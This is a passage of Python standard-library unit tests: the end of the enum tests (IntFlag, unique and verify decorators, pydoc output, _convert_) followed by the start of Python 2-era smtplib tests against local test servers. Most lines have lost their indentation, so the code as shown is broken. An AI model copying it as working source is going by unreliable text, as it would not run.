self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'GREEN' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RW' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertTrue(Color.GREEN in Open)
self.assertTrue(Open.RW in Color)
self.assertFalse('GREEN' in Color)
self.assertFalse('RW' in Open)
self.assertTrue(2 in Color)
self.assertTrue(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that exactly 256 values were seen: the 8 canonical members plus 248 composites
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestEmptyAndNonLatinStrings(unittest.TestCase):
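"""Tests of member names that are empty or contain non-Latin characters."""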
def test_empty_string(self):
with self.assertRaises(ValueError):
empty_abc = Enum('empty_abc', ('', 'B', 'C'))
def test_non_latin_character_string(self):
greek_abc = Enum('greek_abc', ('\u03B1', 'B', 'C'))
item = getattr(greek_abc, '\u03B1')
self.assertEqual(item.value, 1)
def test_non_latin_number_string(self):
hebrew_123 = Enum('hebrew_123', ('\u05D0', '2', '3'))
item = getattr(hebrew_123, '\u05D0')
self.assertEqual(item.value, 1)
class TestUnique(unittest.TestCase):
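"""Tests of the unique() decorator."""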
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestVerify(unittest.TestCase):
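"""Tests of the verify() decorator and the EnumCheck conditions."""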
def test_continuous(self):
@verify(CONTINUOUS)
class Auto(Enum):
FIRST = auto()
SECOND = auto()
THIRD = auto()
FORTH = auto()
#
@verify(CONTINUOUS)
class Manual(Enum):
FIRST = 3
SECOND = 4
THIRD = 5
FORTH = 6
#
with self.assertRaisesRegex(ValueError, 'invalid enum .Missing.: missing values 5, 6, 7, 8, 9, 10, 12'):
@verify(CONTINUOUS)
class Missing(Enum):
FIRST = 3
SECOND = 4
THIRD = 11
FORTH = 13
#
with self.assertRaisesRegex(ValueError, 'invalid flag .Incomplete.: missing values 32'):
@verify(CONTINUOUS)
class Incomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 16
FORTH = 64
#
with self.assertRaisesRegex(ValueError, 'invalid flag .StillIncomplete.: missing values 16'):
@verify(CONTINUOUS)
class StillIncomplete(Flag):
FIRST = 4
SECOND = 8
THIRD = 11
FORTH = 32
def test_composite(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': aliases b and d are missing combined values of 0x3 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(Flag):
b = 3
c = 4
d = 6
#
self.assertEqual(enum.show_flag_values(3), [1, 2])
class Bizarre(IntFlag):
b = 3
c = 4
d = 6
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertEqual(Bizarre.b.value, 3)
self.assertEqual(Bizarre.c.value, 4)
self.assertEqual(Bizarre.d.value, 6)
with self.assertRaisesRegex(
ValueError,
"invalid Flag 'Bizarre': alias d is missing value 0x2 .use enum.show_flag_values.value. for details.",
):
@verify(NAMED_FLAGS)
class Bizarre(IntFlag):
c = 4
d = 6
self.assertEqual(enum.show_flag_values(2), [2])
def test_unique_clean(self):
@verify(UNIQUE)
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
#
@verify(UNIQUE)
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@verify(UNIQUE)
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@verify(UNIQUE)
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@verify(UNIQUE)
class Silly(Enum):
one = 1
two = 'dos'
name = 3
#
@verify(UNIQUE)
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
class TestHelpers(unittest.TestCase):
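"""Tests of the _is_sunder, _is_dunder, and _is_private name helpers."""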
sunder_names = '_bad_', '_good_', '_what_ho_'
dunder_names = '__mal__', '__bien__', '__que_que__'
private_names = '_MyEnum__private', '_MyEnum__still_private'
private_and_sunder_names = '_MyEnum__private_', '_MyEnum__also_private_'
random_names = 'okay', '_semi_private', '_weird__', '_MyEnum__'
def test_sunder(self):
for name in self.sunder_names + self.private_and_sunder_names:
self.assertTrue(enum._is_sunder(name), '%r is not a sunder name?' % name)
for name in self.dunder_names + self.private_names + self.random_names:
self.assertFalse(enum._is_sunder(name), '%r is a sunder name?' % name)
def test_dunder(self):
for name in self.dunder_names:
self.assertTrue(enum._is_dunder(name), '%r is not a dunder name?' % name)
for name in self.sunder_names + self.private_names + self.private_and_sunder_names + self.random_names:
self.assertFalse(enum._is_dunder(name), '%r is a dunder name?' % name)
def test_is_private(self):
for name in self.private_names + self.private_and_sunder_names:
self.assertTrue(enum._is_private('MyEnum', name), '%r is not a private name?' % name)
for name in self.sunder_names + self.dunder_names + self.random_names:
self.assertFalse(enum._is_private('MyEnum', name), '%r is a private name?' % name)
class TestEnumTypeSubclassing(unittest.TestCase):
pass
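# The pydoc renderings below are compared verbatim in TestStdLib.test_pydoc;
# the *_without_docs variant applies when docstrings are stripped (python -OO).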
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1, boundary=None)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Readonly properties inherited from enum.EnumType:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = Color.blue
|\x20\x20
| green = Color.green
|\x20\x20
| red = Color.red
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumType:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
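"""Tests of how Enum interacts with pydoc and inspect."""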
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumType),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(set(values.keys()), set(result.keys()))
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumType),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumType, object=EnumType.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
self.assertEqual(
len(values), len(result),
"%s != %s" % ([a.name for a in values], [a.name for a in result])
)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_test_simple_enum(self):
@_simple_enum(Enum)
class SimpleColor:
RED = 1
GREEN = 2
BLUE = 3
class CheckedColor(Enum):
RED = 1
GREEN = 2
BLUE = 3
self.assertTrue(_test_simple_enum(CheckedColor, SimpleColor) is None)
SimpleColor.GREEN._value_ = 9
self.assertRaisesRegex(
TypeError, "enum mismatch",
_test_simple_enum, CheckedColor, SimpleColor,
)
class CheckedMissing(IntFlag, boundary=KEEP):
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
CM = CheckedMissing
self.assertEqual(list(CheckedMissing), [CM.SIXTY_FOUR, CM.ONE_TWENTY_EIGHT, CM.TWENTY_FORTY_EIGHT])
#
@_simple_enum(IntFlag, boundary=KEEP)
class Missing:
SIXTY_FOUR = 64
ONE_TWENTY_EIGHT = 128
TWENTY_FORTY_EIGHT = 2048
ALL = 2048 + 128 + 64 + 12
M = Missing
self.assertEqual(list(Missing), [M.SIXTY_FOUR, M.ONE_TWENTY_EIGHT, M.TWENTY_FORTY_EIGHT])
#
_test_simple_enum(CheckedMissing, Missing)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum, not_exported={'bin', 'show_flag_values'})
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
CONVERT_STRING_TEST_NAME_D = 5
CONVERT_STRING_TEST_NAME_C = 5
CONVERT_STRING_TEST_NAME_B = 5
CONVERT_STRING_TEST_NAME_A = 5 # This one should sort first.
CONVERT_STRING_TEST_NAME_E = 5
CONVERT_STRING_TEST_NAME_F = 5
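# Illustrative sketch (not used by the tests below; the class name is made up):
# when several names share a value, a plain Enum keeps the first *defined* name
# as the canonical member, while IntEnum._convert_ sorts the candidate names so
# the lexicographically smallest one wins -- which is what
# TestIntEnumConvert.test_convert_value_lookup_priority checks.
class _AliasLookupSketch(Enum):
    B = 5
    A = 5  # alias: _AliasLookupSketch(5).name is still 'B'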
class TestIntEnumConvert(unittest.TestCase):
def setUp(self):
# Reset the module-level test variables to their original integer
# values, otherwise the already created enum values get converted
# instead.
for suffix in ['A', 'B', 'C', 'D', 'E', 'F']:
globals()[f'CONVERT_TEST_NAME_{suffix}'] = 5
globals()[f'CONVERT_STRING_TEST_NAME_{suffix}'] = 5
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexicographical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(python_version == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(python_version >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(
python_version < (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.IntEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STRING_TEST_'))
self.assertEqual(repr(test_type.CONVERT_STRING_TEST_NAME_A), '%s.CONVERT_STRING_TEST_NAME_A' % module)
self.assertEqual(str(test_type.CONVERT_STRING_TEST_NAME_A), 'CONVERT_STRING_TEST_NAME_A')
with self.assertWarns(DeprecationWarning):
self.assertEqual(format(test_type.CONVERT_STRING_TEST_NAME_A), '5')
# global names for StrEnum._convert_ test
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
class TestStrEnumConvert(unittest.TestCase):
def setUp(self):
global CONVERT_STR_TEST_1
global CONVERT_STR_TEST_2
CONVERT_STR_TEST_2 = 'goodbye'
CONVERT_STR_TEST_1 = 'hello'
def test_convert(self):
test_type = enum.StrEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_STR_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_STR_TEST_1, 'hello')
self.assertEqual(test_type.CONVERT_STR_TEST_2, 'goodbye')
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_STR_* found.')
def test_convert_repr_and_str(self):
module = ('test.test_enum', '__main__')[__name__=='__main__']
test_type = enum.StrEnum._convert_(
'UnittestConvert',
module,
filter=lambda x: x.startswith('CONVERT_STR_'))
self.assertEqual(repr(test_type.CONVERT_STR_TEST_1), '%s.CONVERT_STR_TEST_1' % module)
self.assertEqual(str(test_type.CONVERT_STR_TEST_2), 'goodbye')
self.assertEqual(format(test_type.CONVERT_STR_TEST_1), 'hello')
if __name__ == '__main__':
unittest.main()
|
test_smtplib.py
|
import asyncore
import email.utils
import socket
import smtpd
import smtplib
import StringIO
import sys
import time
import select
import unittest
from test import test_support
try:
import threading
except ImportError:
threading = None
HOST = test_support.HOST
def server(evt, buf, serv):
serv.listen(5)
evt.set()
try:
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 500
while buf and n > 0:
r, w, e = select.select([], [conn], [])
if w:
sent = conn.send(buf)
buf = buf[sent:]
n -= 1
conn.close()
finally:
serv.close()
evt.set()
@unittest.skipUnless(threading, 'Threading required for this test.')
class GeneralTests(unittest.TestCase):
def setUp(self):
self._threads = test_support.threading_setup()
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = test_support.bind_port(self.sock)
servargs = (self.evt, "220 Hola mundo\n", self.sock)
self.thread = threading.Thread(target=server, args=servargs)
self.thread.start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
def testBasic1(self):
# connects
smtp = smtplib.SMTP(HOST, self.port)
smtp.close()
def testBasic2(self):
# connects, include port in host name
smtp = smtplib.SMTP("%s:%s" % (HOST, self.port))
smtp.close()
def testLocalHostName(self):
# check that supplied local_hostname is used
smtp = smtplib.SMTP(HOST, self.port, local_hostname="testhost")
self.assertEqual(smtp.local_hostname, "testhost")
smtp.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
smtp = smtplib.SMTP(HOST, self.port, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(smtp.sock.gettimeout())
smtp.close()
def testTimeoutValue(self):
smtp = smtplib.SMTP(HOST, self.port, timeout=30)
self.assertEqual(smtp.sock.gettimeout(), 30)
smtp.close()
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
serv_evt.set()
try:
if hasattr(select, 'poll'):
poll_fun = asyncore.poll2
else:
poll_fun = asyncore.poll
n = 1000
while asyncore.socket_map and n > 0:
poll_fun(0.01, asyncore.socket_map)
# when the client conversation is finished, it will
# set client_evt, and it's then ok to kill the server
if client_evt.is_set():
serv.close()
break
n -= 1
except socket.timeout:
pass
finally:
if not client_evt.is_set():
# allow some time for the client to read the result
time.sleep(0.5)
serv.close()
asyncore.close_all()
serv_evt.set()
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'
# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.
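# Minimal sketch of the pattern described in the NOTE above (an illustrative
# helper, not used by the tests): passing an explicit local_hostname avoids
# smtplib's reverse-DNS/FQDN lookup when it builds the HELO/EHLO name.
def _example_fast_client(host, port):
    return smtplib.SMTP(host, port, local_hostname='localhost', timeout=3)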
# Test behavior of smtpd.DebuggingServer
@unittest.skipUnless(threading, 'Threading required for this test.')
class DebuggingServerTests(unittest.TestCase):
def setUp(self):
# temporarily replace sys.stdout to capture DebuggingServer output
self.old_stdout = sys.stdout
self.output = StringIO.StringIO()
sys.stdout = self.output
self._threads = test_support.threading_setup()
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1))
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
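# (Aside, not executed: the "port 0" trick used in setUp works because binding
#  to port 0 asks the kernel for a free ephemeral port, e.g.
#      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#      s.bind((HOST, 0))
#      port = s.getsockname()[1]
#  similar in spirit to test_support.bind_port used by the other test classes.)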
def tearDown(self):
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
test_support.threading_cleanup(*self._threads)
# restore sys.stdout
sys.stdout = self.old_stdout
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.quit()
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (250, 'Ok')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testNotImplemented(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "EHLO" not implemented')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testVRFY(self):
# VRFY isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
expected = (502, 'Error: command "VRFY" not implemented')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.helo()
expected = (503, 'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
self.assertEqual(smtp.help(), 'Error: command "HELP" not implemented')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
